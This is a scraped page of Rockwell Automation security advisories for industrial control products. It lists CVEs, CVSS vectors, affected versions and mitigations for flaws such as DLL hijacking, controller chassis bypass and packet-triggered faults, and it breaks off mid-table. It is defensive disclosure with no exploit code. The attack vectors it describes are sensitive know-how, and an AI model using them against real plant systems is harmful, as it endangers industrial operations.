Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date 8/13/2024

Updated Date: 8/13/2024

Revision Number: 1.0

CVSS: v3.1: 6.7 , 4.0: 5.4

 

The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving your business or production environments.

 

AFFECTED PRODUCTS AND SOLUTION

Affected Product

First Known in Software Version

Corrected in Software Version

 Emulate3D™

 17.00.00.13276

17.00.00.13348

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-6079 IMPACT

A vulnerability exists in the affected product, which could be leveraged to execute a DLL Hijacking attack. The application loads shared libraries, which are readable and writable by any user. If exploited, a malicious user could leverage a malicious dll and perform a remote code execution attack.

CVSS Base Score: 6.7
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

CVSS Base Score: 5.4
CVSS Vector: CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N


CWE-610:  Externally Controlled Reference to a Resource in Another Sphere
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the following risk mitigations , if possible:

·       Update to the corrected software version, 17.00.00.13348.

·       For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.   

·       JSON CVE-2024-6079

High
SD1682 | Chassis Restrictions Bypass Vulnerability in Select Logix Devices
Published Date:
July 31, 2024
Last Updated:
October 16, 2024
CVE IDs:
CVE-2024-6242
CVSS Scores (v3.1):
8.4
CVSS Scores (v4.0):
7.3
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes
Más información Less Details Chevron DownChevron Down

Published Date: August 1, 2024

Last updated: August 29th, 2024 

Revision Number: 2.0

    August 29, 2024 - Updated Affected Products and Solution Chart  for 1756-EN2T, 1756-EN2F, 1756-EN2TR, 1756-EN3TR

CVSS Score: 3.1: 8.4/10, 4.0:/8.5

 

AFFECTED PRODUCTS AND SOLUTION

Affected Product

First Known in Firmware Revision

Corrected in Firmware Revision

ControlLogix® 5580 (1756-L8z)

V28

 V32.016, V33.015, V34.014,
V35.011 and later

GuardLogix® 5580  (1756-L8zS)

V31

V32.016, V33.015, V34.014,
V35.011 and later

1756-EN4TR

V2

V5.001 and later

1756-EN2T , Series A/B/C

1756-EN2F, Series A/B

1756-EN2TR, Series A/B

1756-EN3TR, Series A

v5.007(unsigned)/v5.027(signed)

No fix for Series A/B/C. Upgrade to Series D.

No fix for Series A/B. Upgrade to Series C.

No fix for Series A/B. Upgrade to Series C.

No fix for Series A. Upgrade to Series B.

1756-EN2T, Series D

1756-EN2F, Series C

1756-EN2TR, Series C

1756-EN3TR, Series B

1756-EN2TP, Series A

1756-EN2T/D: V10.006

1756-EN2F/C: V10.009

1756-EN2TR/C: V10.007

1756-EN3TR/B: V10.007

1756-EN2TP/A: V10.020

V12.001  and later

 

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities. Claroty reported the following vulnerability. 

CVE-2024-6242 IMPACT                                                                                                                                       

A vulnerability exists in the affected products that allows a threat actor to bypass the Trusted® Slot feature in a ControlLogix® controller. If exploited on any affected module in a 1756 chassis, a threat actor could potentially execute CIP commands that modify user projects and/or device configuration on a Logix controller in the chassis.  

CVSS Base Score v3.1: 8.4/10 

CVSS Vector: CVSS:3.1 /AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:H/A:H

CVSS Base Score v4.0: 7.3/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:H/SC:L/SI:H/SA:H

CWE-420: Unprotected Alternate Channel

Known Exploited Vulnerability (KEV) database:  No

Users can use Stakeholder-Specific Vulnerability Categorization  to generate more environment-specific prioritization.

Mitigations and Workarounds 

Users using the affected firmware and who are not able to upgrade to one of the corrected versions are encouraged to apply the following mitigation and security best practices, where possible. 

·       Limit the allowed CIP commands on controllers by setting the mode switch to the RUN position.

·       Security Best Practices

 ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.    

·       JSON CVE 2024-6242

·       System Security Design Guidelines

High
SD1681 | Privilege Escalation Vulnerability in Pavilion8®
Published Date:
July 16, 2024
Last Updated:
November 20, 2024
CVE IDs:
CVE-2024-6435
CVSS Scores (v3.1):
8.8
CVSS Scores (v4.0):
8.7
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date: July 16, 2024 
Last updated: July 16, 2024

Revision Number: 1.0

CVSS Score: v3.1: 8.8/10, v4.0: 8.7/10

 

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

 

AFFECTED PRODUCTS AND SOLUTION

 

 

Affected Product

 

 

 

 

First Known in Software Version(s)

 

 

 

 

Corrected in Software Revision

 

 

 

 

Pavilion8® 

 

 

 

 

v5.15.00 
v5.15.01 
v5.16.00 
v5.17.00 
v5.17.01

 

 

v5.20.00

 

 

 

 

v6.0

 

 

 

Mitigations and Workarounds 

Users using the affected software and who are not able to upgrade to one of the corrected versions are encouraged to apply security best practices, where possible.  

  • Limit access to only users who need it. 

  • Periodically review user access and privileges to confirm accuracy. 

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring systems to assess the following vulnerabilities.  

CVE-2024-6435 IMPACT

A privilege escalation vulnerability exists in the affected products which could allow a malicious user with basic privileges to access functions which should only be available to users with administrative level privileges. If exploited, an attacker could read sensitive data, and create users. For example, a malicious user with basic privileges could perform critical functions such as creating a user with elevated privileges and reading sensitive information in the “views” section.  

CVSS 3.1 Base Score: 8.8/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.7/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-732: Incorrect Permission Assignment for Critical Resource

Known Exploited Vulnerability (KEV) database:  No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment specific prioritization.

 ADDITIONAL RESOURCES

High
SD1680 | Major nonrecoverable fault in 5015 – AENFTXT
Published Date:
July 10, 2024
Last Updated:
November 20, 2024
Products:
CVE-2024-6089
CVSS Scores (v3.1):
7.5
CVSS Scores (v4.0):
8.7
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Major nonrecoverable fault in 5015 – AENFTXT  

Published Date: 7/16/2024

Updated Date: 7/16/2024 

Revision Number: 1.0

CVSS: v3.1: 7.5, 4.0: 8.7

 

The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

 

AFFECTED PRODUCTS AND SOLUTION

 

 

Affected Product

 

 

 

 

First Known in firmware revision

 

 

 

 

Corrected in firmware revision

 

 

 

 

5015 - AENFTXT

 

 

 

 

v2.011

 

 

 

 

v2.012

 

 

 

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-6089 IMPACT

An input validation vulnerability exists in the affected products when a manipulated PTP packet is sent, causing the secondary adapter to result in a major nonrecoverable fault. If exploited, a power cycle is required to recover the product.  

CVSS Base Score: 8.7/10 
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CVSS Base Score: 7.5/10 
CVSS Vector: CVSS:3.1 AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 
CWE-20:  Improper Input Validation 
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds 
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

  • Update to the corrected firmware revision, v2.012.

  • For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.   

High
SD1679 | Input Validation Vulnerability exists in the SequenceManager™ Server
Published Date:
July 10, 2024
Last Updated:
September 27, 2024
CVE IDs:
CVE-2024-6436
CVSS Scores (v3.1):
7.5
CVSS Scores (v4.0):
8.7
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date: July 16, 2024

Last updated: October 1, 2024

Revision Number: 2.0

October 1, 2024 - Updated CVE Number.

CVSS Score: v3.1 7.5/10, v4.0 8.7/10

 

The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

 

AFFECTED PRODUCTS AND SOLUTION

Affected Product

Affected Software Versions

Corrected in software version

SequenceManager™

<v2.0

v2.0 or later

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-6436 IMPACT

An input validation vulnerability exists in the affected products which could allow a malicious user to send malformed packets to the server and cause a denial-of-service condition. If exploited, the device would become unresponsive, and a manual restart will be required for recovery. Additionally, if exploited, there could be a loss of view for the downstream equipment sequences in the controller. Users would not be able to view the status or command the equipment sequences, however the equipment sequence would continue to execute uninterrupted.

CVSS 3.1 Base Score: 7.5/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.7/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N 

CWE: CWE-428: Unquoted Search Path or Element

 

Known Exploited Vulnerability (KEV) database:  No

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds

Users using the affected software who are not able to upgrade to one of the corrected versions are encouraged to apply security best practices, where possible.

·       Security Best Practices

 

 ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.     

·       JSON CVE-2024-6436

 

Medium
SD1678 | Unsecured Private Keys in FactoryTalk® System Services
Published Date:
July 02, 2024
Last Updated:
December 01, 2024
CVE IDs:
CVE-2024-6325 , CVE-2024-6236
CVSS Scores (v3.1):
6.5, 5.9
CVSS Scores (v4.0):
6.0, 1.8
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date: July 11, 2024

Last updated: July 11, 2024

Revision Number: 1.0

CVSS Score: v3.1: 6.5/10, 5.9/10 ; v4.0: 6.0/10, 1.8/10

AFFECTED PRODUCTS AND SOLUTION

Affected Product

Affected Version

Corrected Version

FactoryTalk® System Services (installed via FTPM)

v6.40

V6.40.01

FactoryTalk® Policy Manager (FTPM)

v6.40

V6.40.01

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-6325 IMPACT

The v6.40 release of FactoryTalk® Policy Manager allowed the private keys to be insecurely stored with read and execute privileges for the Windows group, ‘Everyone’. These keys are used to generate digital certificates and pre-shared keys. This vulnerability could allow a malicious user with access to the machine to obtain private keys. If obtained, a malicious user could impersonate resources on the secured network. For customers using FactoryTalk® Policy Manager v6.40 who mitigated CVE-2021-22681 and CVE-2022-1161 by implementing CIP security and did not update to the versions of the software that contain the remediation, this vulnerability could allow a threat actor to exploit CVE-2022-1161 and CVE-2022-1161.

CVSS Base Score v3.1: 6.5/10

CVSS Vector String: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

 

CVSS Base Score v4.0: 6.0/10

CVSS Vector String: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N

CWE: CWE-269 Improper Privilege Management

 

CVE-2024-6236 IMPACT

 

An exposure of sensitive information vulnerability exists in the FactoryTalk® System Service. A malicious user could exploit this vulnerability by starting a back-up or restore process, which temporarily exposes private keys, passwords, pre-shared keys, and database folders when they are temporarily copied to an interim folder. This vulnerability is due to the lack of explicit permissions set on the backup folder. If private keys are obtained by a malicious user, they could impersonate resources on the secured network.

 

CVSS Base Score v3.1: 5.9/10

CVSS Vector String: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N

CVSS Base Score v4.0: 1.8/10

CVSS Vector String: CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N

CWE-269 Improper Privilege Management

Known Exploited Vulnerability (KEV) database:  No

 

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds

Users using the affected software are encouraged to implement the following steps to invalidate the existing vulnerable private keys/digital certificates and regenerate new secure ones.

·       Clear CIP Security configurations from devices and from FactoryTalk® Policy Manager

·       Update FactoryTalk® System Services and FactoryTalk® Policy Manager to v6.40.01

·       Redeploy CIP Security Policy 

Detailed steps are below (FactoryTalk System Services (FTSS) is updated through the installation of FactoryTalk Policy Manager (FTPM)

1)      Remove deployed security policy from all devices using FactoryTalk® Policy Manager (FTPM):

a.       Open FTPM.

b.       Document all Zone’s security settings and all Conduit’s settings as you must re-create them after updating FTPM.

c.       Change all devices port’s Policies > Zone values to the “Unassigned” Zone.

d.       Delete all zones and conduits.

e.       Deploy (CIP).  Ensure that all endpoints were reset successfully.

f.        [migrating from v6.40 only] Deploy (OPC UA).  Ensure all endpoints were reset successfully.

                                                               i.      For any OPC UA clients, perform whatever steps are required by those clients to remove the previously applied certificates.

g.       Close FTPM

2)      Delete the \FTSS_backup folder:

a.       c:\ProgramData\Rockwell\RNAServer\Global\RnaStore\FTSS_Backup

3)      Delete the \keystore folder:

a.       c:\ProgramData\Rockwell Automation\FactoryTalk System Services\keystore

4)      Delete any backup copies of the \keystore folder.  They will be named the same as the \keystore folder but with a suffix appended to it, like:

a.       c:\ProgramData\Rockwell Automation\FactoryTalk System Services\ keystore_source_2024_04_25_12_25_38_541566

5)      Delete the PSKs.json file:

a.       c:\ProgramData\Rockwell Automation\FactoryTalk System Services\PSKs.json

6)      Delete any backup copies of the PSKs.json file.  They will be named the same as the PSKs.json file but with a suffix appended to it, like:

a.       c:\ProgramData\Rockwell Automation\FactoryTalk System Services\ PSKs.json_source_2024_05_17_07_38_25_200356

7)      Install FactoryTalk® Policy Manager version 6.40.01.

a.       Restart the computer when prompted at the end of the install.

8)      Open FTPM.  FTPM will attempt to connect to the FactoryTalk® System Services web server before proceeding.

9)      If FTPM could not successfully connect to FactoryTalk® System Services (FTSS), it is because the FTSS service hasn’t started yet.  It will eventually start or else you can start the FTSS service manually in Windows Services.

10)   Re-create the original Zones.

11)   Move the devices from the unassigned Zone back to their original zones.

12)   Re-create the original Conduits.

13)   Deploy (CIP endpoints).

14)   [migrating from v6.40 only] Deploy (OPC UA endpoints).

a.       For any OPC UA client endpoints, manually apply the newly generated certificates from this deploy.

Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

·       Security Best Practices

 ADDITIONAL RESOURCES

·       JSON CVE 2024 6325

·       JSON CVE 2024 6326

 

Critical
SD1677 | ThinManager® ThinServer™ Improper Input Validation Vulnerabilities
Published Date:
June 20, 2024
Last Updated:
October 16, 2024
CVE IDs:
CVE-2024-5988 , CVE-2024-5989, CVE-2024-5990
CVSS Scores (v3.1):
9.8, 7.5
CVSS Scores (v4.0):
9.3, 8.7
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes
Más información Less Details Chevron DownChevron Down

ThinManager® ThinServer™ Improper Input Validation Vulnerabilities

Published Date: June 25, 2024

Last updated: June 25, 2024

Revision Number: 1.0

CVSS Score: 3.1: 9.8/10, 7.5/10, 4.0: 9.3/10, 8.7 /10

 

AFFECTED PRODUCTS AND SOLUTION

Affected Product

CVE

First Known in software version

Corrected in software version (Available Here)

ThinManager® ThinServer™

2024-5988

2024-5989

 

 

 

 

 

11.1.0

11.2.0

12.0.0

12.1.0

13.0.0

13.1.0

13.2.0

11.1.8

11.2.9

12.0.7

12.1.8

13.0.5

13.1.3

13.2.2

2024-5990

11.1.0

11.2.0

12.0.0

12.1.0

13.0.0

13.1.0

11.1.8

11.2.9

12.0.7

12.1.8

13.0.4

13.1.2

 

Mitigations and Workarounds

Customers using the affected software are encouraged to apply the risk mitigations from the list below, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the potential risk of vulnerability.

·       Update to the corrected software versions via the ThinManager® Downloads Site

·       Limit remote access for TCP Port 2031 to known thin clients and ThinManager® servers.

·       Security Best Practices

 

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. This vulnerability was discovered and reported to Rockwell Automation by security researchers at Tenable Network Security.

CVE-2024-5988 IMPACT

Due to an improper input validation, an unauthenticated threat actor can send a malicious message to invoke a local or remote executable and cause a remote code execution condition on the affected device.  

CVSS Base Score: 9.8/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

 

CVSS Base Score: 9.3/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: 20 Improper Input Validation

 

CVE-2024-5989 IMPACT

Due to an improper input validation, an unauthenticated threat actor can send a malicious message to invoke SQL injection into the program and cause a remote code execution condition on the affected device.   

CVSS Base Score: 9.8/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

 

CVSS Base Score: 9.3/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: 20 Improper Input Validation

CVE-2024-5990 IMPACT

Due to an improper input validation, an unauthenticated threat actor can send a malicious message to a monitor thread within ThinServer™ and cause a denial-of-service condition on the affected device. 

CVSS Base Score: 7.5/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

 

CVSS Base Score: 8.7/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: 20 Improper Input Validation

 

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

 

 ADDITIONAL RESOURCES

·       CVE-2024-5988 JSON

·       CVE-2024-5989 JSON

·       CVE-2024-5990 JSON

 

Critical
SD1676 | FactoryTalk® View SE v11 Information Leakage Vulnerability via Authentication Restriction
Published Date:
June 12, 2024
Last Updated:
December 01, 2024
CVE IDs:
CVE-2024-37368
CVSS Scores (v3.1):
9.8
CVSS Scores (v4.0):
9.2
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date: June 13, 2024

Last updated: June 13, 2024

Revision Number: 1.0

CVSS Score: v3.1: 9.8/10, v4.0: 9.2/10

 

The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

 

AFFECTED PRODUCTS AND SOLUTION 

 

 

Affected Product

 

 

 

 

First Known in software version

 

 

 

 

Corrected in software version

 

 

 

 

FactoryTalk® View SE

 

 

 

 

v11.0

 

 

 

 

v14.0

 

 

 

Mitigations and Workarounds 

Users using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.   

  • It is recommended that users enforce proper access controls within the network and segment networks containing sensitive information using IPSec: https://rockwellautomation.custhelp.com/app/answers/answer_view/a_id/1090456

 

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring systems to assess the following vulnerabilities. 

 

CVE-2024-37368 IMPACT

A user authentication vulnerability exists in the affected product. The vulnerability allows a user from a remote system with FTView to send a packet to the customer’s server to view an HMI project. Due to the lack of proper authentication, this action is allowed without proper authentication verification.

 

CVSS 3.1 Base Score: 9.8/10  

 

CSVV 4.0 Base Score: 9.2/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

CWE-287: Improper Authentication

 

Known Exploited Vulnerability (KEV) database: No

 

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

 

 

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.    

 

High
SD1675 | FactoryTalk® View SE v12 Information Leakage Vulnerability via Authentication Restriction
Published Date:
June 12, 2024
Last Updated:
December 01, 2024
CVE IDs:
CVE-2024-37367
CVSS Scores (v3.1):
9.8
CVSS Scores (v4.0):
9.2
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date: June 13, 2024

Last updated: June 13, 2024

Revision Number: 1.0

CVSS Score: v3.1: 9.8/10, v4.0: 9.2/10

 

The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

 

AFFECTED PRODUCTS AND SOLUTION

 

 

Affected Product

 

 

 

 

First Known in software version

 

 

 

 

Corrected in software version

 

 

 

 

FactoryTalk® View SE

 

 

 

 

v12.0

 

 

 

 

V14.0 and later

 

 

 

Mitigations and Workarounds 

Users using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.   

  • It is recommended that users enforce proper access controls within the network and segment networks containing sensitive information using IPSec: https://rockwellautomation.custhelp.com/app/answers/answer_view/a_id/1090456

 

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring systems to assess the following vulnerabilities. 

 

CVE-2024-37367 IMPACT

A user authentication vulnerability exists in the affected product. The vulnerability allows a user from a remote system with FTView to send a packet to the customer’s server to view an HMI project.  This action is allowed without proper authentication verification.

 

 

CSVV 4.0 Base Score: 8.2/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N 

CWE-287: Improper Authentication

 

Known Exploited Vulnerability (KEV) database: No

 

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

 

 

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.    

 

High
SD1674 | FactoryTalk® View SE Local Privilege Escalation Vulnerability via Local File Permissions
Published Date:
June 12, 2024
Last Updated:
December 01, 2024
CVE IDs:
CVE-2024-37369
CVSS Scores (v3.1):
7.8
CVSS Scores (v4.0):
8.5
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date: June 13, 2024

Last updated: June 13, 2024

Revision Number: 1.0

CVSS Score: v3.1: 7.8/10, v4.0: 8.5/10 

 

The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

 

AFFECTED PRODUCTS AND SOLUTION

 

 

Affected Product

 

 

 

 

First Known in software version

 

 

 

 

Corrected in software version 

 

 

 

 

FactoryTalk® View SE

 

 

 

 

V12.0

 

 

 

 

v14

 

 

 

Mitigations and Workarounds 

Users using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.   

  • Use the Secure Install option when installing FactoryTalk® Services Platform.

 

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring systems to assess the following vulnerabilities. 

 

CVE-2024-37369 IMPACT

A privilege escalation vulnerability exists in the affected product. The vulnerability allows low-privilege users to edit scripts, bypassing Access Control Lists, and potentially gaining further access within the system.

 

CVSS 3.1 Base Score: 7.8/10  

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

 

CSVV 4.0 Base Score: 8.5/10

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

 

CWE-732: Incorrect Permission Assignment for Critical Resource

 

Known Exploited Vulnerability (KEV) database: No

 

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

 

 

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.    

High
SD1673 | Multicast Request Causes major nonrecoverable fault on Select Controllers
Published Date:
June 12, 2024
Last Updated:
December 01, 2024
CVE IDs:
CVE 2024-5659
CVSS Scores (v3.1):
7.4
CVSS Scores (v4.0):
8.3
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes
Más información Less Details Chevron DownChevron Down

Published Date: June 11, 2024

Last updated: June 11, 2024

Revision Number: 1.0

CVSS Score: v3.1: 7.4/10, 4.0: 8.3/10

 

AFFECTED PRODUCTS AND SOLUTION

 

 

Affected Product

 

 

 

 

First Known in firmware revision

 

 

 

 

Corrected in firmware revision

 

 

 

 

ControlLogix® 5580

 

 

 

 

V34.011

 

 

 

 

V34.014, V35.013, V36.011 and later

 

 

 

 

GuardLogix 5580 

 

 

 

 

V34.011

 

 

 

 

V34.014, V35.013, V36.011 and later  

 

 

 

 

1756-EN4

 

 

 

 

V4.001

 

 

 

 

V6.001 and later

 

 

 

 

CompactLogix 5380 

 

 

 

 

V34.011

 

 

 

 

V34.014, V35.013, V36.011 and later  

 

 

 

 

Compact GuardLogix 5380

 

 

 

 

V34.011

 

 

 

 

V34.014, V35.013, V36.011 and later  

 

 

 

 

CompactLogix 5480

 

 

 

 

V34.011

 

 

 

 

V34.014, V35.013, V36.011 and later 

 

 

 

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

Rockwell Automation was made aware of a vulnerability that causes all affected controllers on the same network to result in a major nonrecoverable fault(MNRF/Assert). This vulnerability could be exploited by sending abnormal packets to the mDNS port If exploited, the availability of the device would be compromised.

 

CVE-2024-5659 IMPACT

CVSS Base Score v3.1: 7.4/10

CVSS Vector String: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

CVSS Base Score v4.0: 8.3/10

CVSS Vector String: CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H

CWE: CWE 670 – Always Incorrect Flow Implementation

Known Exploited Vulnerability (KEV) database:  No

 

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds

Users using the affected software and who are not able to upgrade to one of the corrected versions are encouraged to apply the risk mitigations, where possible.

·       Users who do not use Automatic Policy Deployment (APD) should block mDNS port, 5353 to help prevent communication.

·       Enable CIP Security. CIP Security with Rockwell Automation Products Application Technique

·       Security Best Practices

 

 ADDITIONAL RESOURCES

·       JSON CVE 2024 - 5659

SD1672 | IMPORTANT NOTICE: Rockwell Automation Reiterates Customer Guidance to Disconnect Devices from the Internet to Protect from Cyber Threats
Published Date:
May 21, 2024
Last Updated:
December 03, 2024
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

IMPORTANT NOTICE: Rockwell Automation Reiterates Customer Guidance to Disconnect Devices from the Internet to Protect from Cyber Threats

Due to heightened geopolitical tensions and adversarial cyber activity globally, Rockwell Automation is issuing this notice urging all customers to take IMMEDIATE action to assess whether they have devices facing the public internet and, if so, urgently remove that connectivity for devices not specifically designed for public internet connectivity.

Consistent with Rockwell Automation’s guidance for all devices not specifically designed for public internet connectivity (for example, cloud and edge offerings), users should never configure their assets to be directly connected to the public-facing internet. Removing that connectivity as a proactive step reduces attack surface and can immediately reduce exposure to unauthorized and malicious cyber activity from external threat actors.

More information on attacks on public-internet-exposed assets, including information on how to identify exposed assets and disconnect them from the public internet, is available in these documents from Rockwell Automation and CISA (Cybersecurity and Infrastructure Security Agency):

In addition to disconnecting assets from the public internet or if disconnection is not feasible, Rockwell Automation also urges its customers to follow the security best practices outlined in this document: Rockwell Automation | Security Best Practices [login required].

Customers should be aware of the following related CVE’s and ensure mitigations are in place, where possible.

CVE No.

Alert Code

(ICSA)

Advisory Name and Link, URL

2021-22681

21-056-03

CISA | Rockwell Automation Logix Controllers (Update A)

https://www.cisa.gov/news-events/ics-advisories/icsa-21-056-03

2022-1159

22-090-07

CISA | Rockwell Automation Studio 5000 Logix Designer

https://www.cisa.gov/news-events/ics-advisories/icsa-22-090-07

2023-3595

23-193-01

CISA | Rockwell Automation Select Communication Modules

https://www.cisa.gov/news-events/ics-advisories/icsa-23-193-01

2023-46290

23-299-06

CISA | Rockwell Automation FactoryTalk Services Platform

https://www.cisa.gov/news-events/ics-advisories/icsa-23-299-06

2024-21914

24-086-04

